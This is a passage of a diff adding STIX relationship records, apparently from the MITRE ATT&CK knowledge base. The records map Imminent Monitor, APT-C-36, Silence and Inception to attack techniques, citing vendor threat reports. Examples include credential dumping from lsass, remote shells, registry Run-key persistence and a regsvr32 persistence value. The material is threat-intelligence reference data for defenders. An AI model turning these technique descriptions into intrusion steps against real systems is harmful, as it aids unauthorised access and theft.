+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a feature to disable Windows Task Manager.(Citation: Imminent Unit42 Dec2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--ff6d64fb-c41c-409b-91b0-e4fb9d9edba1",
+ "type": "relationship",
+ "modified": "2020-05-07T02:33:06.900Z",
+ "created": "2020-05-07T02:33:06.900Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has leveraged CreateProcessW() call to execute the debugger.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--106cf74b-91d6-4348-91ae-48d1a42abb73",
+ "type": "relationship",
+ "modified": "2020-05-07T02:33:06.912Z",
+ "created": "2020-05-07T02:33:06.912Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has deleted files related to its dynamic debugger feature.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2f0fee17-1cd1-45dd-a1e0-f854c03ed064",
+ "type": "relationship",
+ "modified": "2020-05-07T02:33:06.926Z",
+ "created": "2020-05-07T02:33:06.926Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a CommandPromptPacket and ScriptPacket module(s) for creating a remote shell and executing scripts.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--45c4d1f9-414f-4542-8272-c783f7314514",
+ "type": "relationship",
+ "modified": "2020-05-07T22:39:23.978Z",
+ "created": "2020-05-07T02:33:06.936Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has decoded malware components that are then dropped to the system.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--239cb026-369a-43f0-922c-cdc38d124430",
+ "type": "relationship",
+ "modified": "2020-05-07T02:33:06.943Z",
+ "created": "2020-05-07T02:33:06.943Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Imminent Monitor](https://attack.mitre.org/software/S0434) has a PasswordRecoveryPacket module for recovering browser passwords.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--14307b7b-0837-4c15-a959-0c8d24e05b6b",
+ "type": "relationship",
+ "modified": "2020-05-07T02:33:07.057Z",
+ "created": "2020-05-07T02:33:07.057Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has disguised its scheduled tasks as those used by Google.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5cabd775-7d78-4150-b529-bb8cfb747013",
+ "type": "relationship",
+ "modified": "2020-05-07T03:04:14.719Z",
+ "created": "2020-05-07T03:04:14.719Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6713ab67-e25b-49cc-808d-2b36d4fbc35c",
+ "target_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "(Citation: ESET Okrum July 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--0ee0af6e-c913-406e-9439-f40f5102cae7",
+ "type": "relationship",
+ "modified": "2020-05-07T18:49:44.782Z",
+ "created": "2020-05-07T18:49:44.782Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has embedded a VBScript within a malicious Word document which is executed upon the document opening.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d4922804-7216-4e83-b0c0-6e61b09d5fc0",
+ "type": "relationship",
+ "modified": "2020-05-07T22:32:37.695Z",
+ "created": "2020-05-07T22:32:37.695Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has downloaded binary data from a specified domain after the malicious document is opened.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c3bedbae-b1e1-4a35-8c59-d181dca093e4",
+ "type": "relationship",
+ "modified": "2020-05-07T22:53:31.241Z",
+ "created": "2020-05-07T22:53:31.241Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used compromised credentials to log on to other systems and escalate privileges.(Citation: Group IB Silence Sept 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--9569bfcd-38f8-4cb7-8470-a473ea9e4328",
+ "type": "relationship",
+ "modified": "2020-05-08T17:01:36.095Z",
+ "created": "2020-05-08T17:01:36.095Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has named its backdoor \"WINWORD.exe\".(Citation: Group IB Silence Sept 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--e3038b75-63f6-44c2-9645-673bbf0ffa3b",
+ "type": "relationship",
+ "modified": "2020-05-08T17:01:36.105Z",
+ "created": "2020-05-08T17:01:36.105Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) can create, delete, or modify a specified Registry key or value.(Citation: Group IB Silence Sept 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--396a5415-67aa-4ec6-ae27-6be641d69e15",
+ "type": "relationship",
+ "modified": "2020-05-08T17:01:36.122Z",
+ "created": "2020-05-08T17:01:36.122Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used the Farse6.1 utility (based on [Mimikatz](https://attack.mitre.org/software/S0002)) to extract credentials from lsass.exe.(Citation: Group IB Silence Sept 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--a9c366b6-270d-4884-86dd-7c048460741b",
+ "type": "relationship",
+ "modified": "2020-05-13T19:31:54.362Z",
+ "created": "2020-05-08T17:01:36.126Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used Nmap to scan the corporate network, build a network topology, and identify vulnerable hosts.(Citation: Group IB Silence Sept 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a6dc02a8-2ce3-45db-a7e5-e475d6acec3c",
+ "type": "relationship",
+ "modified": "2020-05-08T17:01:36.139Z",
+ "created": "2020-05-08T17:01:36.139Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used RDP for lateral movement.(Citation: Group IB Silence Sept 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--5cc793b0-cc45-439e-a994-c8884ca55fe7",
+ "type": "relationship",
+ "modified": "2020-05-08T17:01:36.169Z",
+ "created": "2020-05-08T17:01:36.169Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has downloaded additional modules and malware to victim\u2019s machines.(Citation: Group IB Silence Sept 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--948146db-f966-4e0c-bbb2-289e2eae6718",
+ "type": "relationship",
+ "modified": "2020-05-08T17:01:36.171Z",
+ "created": "2020-05-08T17:01:36.171Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Unit 42 Inception November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/",
+ "description": "Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used weaponized documents attached to spearphishing emails for reconnaissance and initial compromise.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Symantec Inception Framework March 2018)(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--42580e44-781d-467d-b131-45f7d4651d0a",
+ "type": "relationship",
+ "modified": "2020-05-12T15:18:43.918Z",
+ "created": "2020-05-08T17:17:37.627Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "tool--b76b2d94-60e4-4107-a903-4a3a7622fb3b",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas August 2019",
+ "url": "https://securelist.com/recent-cloud-atlas-activity/92016/",
+ "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "(Citation: Kaspersky Cloud Atlas August 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9b2caa3d-10ae-471b-b0b1-527fbcd006ec",
+ "type": "relationship",
+ "modified": "2020-05-08T17:17:37.635Z",
+ "created": "2020-05-08T17:17:37.635Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used a reconnaissance module to gather information about the operating system and hardware on the infected host.(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--4b3f85b7-a7a4-446f-a3cb-d922268ee879",
+ "type": "relationship",
+ "modified": "2020-05-08T20:02:19.454Z",
+ "created": "2020-05-08T18:41:16.342Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used a reconnaissance module to identify active processes and other associated loaded modules.(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--cece5cb5-3837-4551-be22-5c27b63eae63",
+ "type": "relationship",
+ "modified": "2020-05-12T15:21:21.632Z",
+ "created": "2020-05-08T18:41:16.415Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ },
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has incorporated at least five different cloud service providers into their C2 infrastructure including CloudMe.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--16d59476-9fff-413f-9dbe-5c9e43c3860d",
+ "type": "relationship",
+ "modified": "2020-05-20T20:54:12.843Z",
+ "created": "2020-05-08T18:41:16.417Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has ensured persistence at system boot by setting the value regsvr32 %path%\\ctfmonrn.dll /s.(Citation: Kaspersky Cloud Atlas December 2014)",
+ "relationship_type": "uses",
+ "id": "relationship--cab50f6d-3621-4429-8c9a-803df15f4e75",
+ "type": "relationship",
+ "modified": "2020-05-08T18:56:23.074Z",
+ "created": "2020-05-08T18:41:16.419Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c",
+ "external_references": [
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has used specific malware modules to gather domain membership.(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--bcf90f77-1b2b-46e2-914b-051e51a2d409",
+ "type": "relationship",
+ "modified": "2020-05-12T15:17:50.112Z",
+ "created": "2020-05-08T18:41:16.422Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has encrypted network communications with AES.(Citation: Kaspersky Cloud Atlas December 2014)",
+ "relationship_type": "uses",
+ "id": "relationship--cd89dfdb-5c48-4a91-ba2f-e3c6e74c5094",
+ "type": "relationship",
+ "modified": "2020-05-08T18:41:16.424Z",
+ "created": "2020-05-08T18:41:16.424Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Kaspersky Cloud Atlas December 2014",
+ "url": "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/",
+ "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) has maintained persistence by modifying Registry run key value \n HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\.(Citation: Kaspersky Cloud Atlas December 2014)",
+ "relationship_type": "uses",
+ "id": "relationship--1215a807-77b4-465e-9c82-c4f023e668da",
+ "type": "relationship",
+ "modified": "2020-05-12T15:17:50.158Z",
+ "created": "2020-05-08T18:41:16.426Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--ead23196-d7b6-4ce6-a124-4ab4b67d81bd",
+ "target_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d",
+ "external_references": [
+ {
+ "source_name": "Symantec Inception Framework March 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies",
+ "description": "Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020."
+ }
+ ],
+ "description": "[Inception](https://attack.mitre.org/groups/G0100) used chains of compromised routers to proxy C2 communications between them and cloud service providers.(Citation: Symantec Inception Framework March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--3bd9165f-6f5f-4c1a-bdbf-47c733d577a8",
+ "type": "relationship",
+ "modified": "2020-05-20T20:54:12.954Z",
+ "created": "2020-05-08T18:41:16.430Z"
+ },
+ {
